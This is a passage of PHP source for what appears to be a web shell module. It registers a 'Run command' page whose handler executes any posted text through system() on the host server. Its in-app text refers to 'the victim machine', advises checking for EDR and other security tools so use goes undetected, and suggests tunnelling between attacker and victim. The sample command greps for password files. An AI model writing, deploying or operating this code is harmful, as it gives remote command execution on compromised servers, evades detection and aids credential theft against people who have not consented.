$feature["op"] === $page)); $page_content = __PREFIX__makePage( $features, $css, $page, [__PREFIX__makePageHeader( $feature[0]["title"], $feature[0]["description"] ), __PREFIX__makeAlert( "Running system commands", "Running system commands results in the creation of a child process from the webserver/php process (aka a new terminal is spawned), this behaviour as you may expect can be easily detected by EDR and other security solutions.
If triggering alert is not a problem, safely ignore this alert, otherwise carefully examine the victim machine and ensure that there is no security solution running before using this module." ), __PREFIX__makeForm( $page, $_SERVER["REQUEST_URI"], [__PREFIX__makeInput( "textarea", "Command", "__PARAM_1__", "ls -lah | grep pass", "Command to run through the default system shell. This can be used to establish a full duplex tunnel between the attacker and the victim machine.", true )] )] ); } /** * Handle the login operation * * @param $operation string The operation to handle * @param $features array{title: string, description: string, svg: string, hidden?: bool, op: string}[] The features * * @return void */ function __PREFIX__handleSystemCommand($operation, $features) { system($_POST["__PARAM_1__"]); } /** * Hook the features to add the login feature * * @param $features array{title: string, description: string, svg: string, hidden?: bool, op: string}[] The features * container * * @return void */ function __PREFIX__systemCommandHooksFeatures(&$features) { global $RUN_COMMAND; $features[] = ["title" => "Run command", "description" => "Run a system command using the default shell.", "svg" => '', "op" => $RUN_COMMAND]; } // section.functions.end // section.hooks add_hook("features", "__PREFIX__systemCommandHooksFeatures"); add_named_hook("GET_page", $RUN_COMMAND, "__PREFIX__makeSystemCommandPage"); add_named_hook("POST_operation", $RUN_COMMAND, "__PREFIX__handleSystemCommand"); // section.hooks.end